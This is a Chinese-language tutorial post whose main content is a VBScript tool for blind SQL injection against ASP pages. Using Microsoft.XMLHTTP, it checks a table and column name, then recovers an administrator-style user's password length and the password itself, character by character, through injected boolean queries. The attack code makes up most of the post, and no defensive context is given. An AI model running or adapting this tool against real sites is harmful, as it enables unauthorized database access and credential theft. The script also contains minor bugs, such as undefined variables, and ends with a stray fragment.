VBS实现SQL注入/反击进阶

脚本注入攻击，这个从2002年初就在中国流行的入侵方式，可以说到现在已经被我们说烂了，讨论烂了，不过您是否曾经想过利用VBS脚本来进行SQL注入呢？本文就可以给您一个解答。

有人用Microsoft ACT提供的Test.SendRequest("http://"; & g_sServer & "/testfiles/browser.asp")方法写了一个vbs注入工具.

不过利用改对象还要装一个几十M大的工具包,我这里仿照给脚本,采用Microsoft.XMLHTTP来实现,利用open函数提交,对有注入的页面进行密码破解:
RightW = "OK!" '定义正确页面返回的关键字.
tablename = "useradmin" '定义表名,列名,本程序不提供表名,列名猜测功能,仅仅提供密码猜测.
filedname = "password"
WScript.Echo "Start check the tname and the fname,please waiting... ..."

URL="http://127.0.0.1/fwork/f.asp?username=admin&password=abzvc" '有注入漏洞的url地址,下面提供的是针对字符型漏洞的注入,数字型只需要稍微更改即可.

Set xPost = createObject("Microsoft.XMLHTTP") '检测表名是否正确
sURL1=URL&"'%20and%20(Select%20Count(1)%20from%20[useradmin])>='0"
xPost.Open "POST",sURL1,0
xPost.Send "1212312"
If instr(xPost.responseText,RightW) <> 0 Then
WScript.Echo "table name is:"&useradmin
End if

sURL2=URL&"'%20and%20(Select%20Count([useradmin].[password])%20from%20[useradmin])>='0" '检测列名是否正确
xPost.Open "POST",sURL2,0
xPost.Send "1212312"
If instr(xPost.responseText,RightW) <> 0 Then
WScript.Echo "field name is:"&filedname
End if

WScript.Echo "Start gussing,Waiting... ..."

For i = 0 to 128 step 1 '猜测密码长度
sURL3=URL&"'and+(select%20username%20from%20useradmin%20where%20len(password)='"&i&"'%20and%20username='user')>='0"
xPost.Open "POST",sURL3,0
xPost.Send "1212312"
If instr(xPost.responseText, RightW) <> 0 Then
Exit For
End If
Next
pwd_len = i
WScript.Echo "the pass length is:"&pwd_len

pwd = "" '猜测密码
strings = "0123456789abcdefghijklmnopqrstuvwxyz" '自定义密码字符串
For j = 1 to pwd_len step 1
For k = 1 to len(strings) step 1

sURL4=URL&"'%20and%20(select%20username%20from%20useradmin%20where%20left(password,"&j&")%20='"&pwd&mid(strings,k,1)&"'%20and%20username='user')>='0"
xPost.Open "POST",sURL4,0
xPost.Send "1212312"

If instr(xPost.responseText,RightW) <> 0 Then
pwd = pwd & mid(strings,k,1)
Exit For
End If
Next
Next

If errn Then
WScript.Echo "error:" & Error.Description
Error.Clear
Else
WScript.Echo "!!!Password:" & pwd
End If

]]>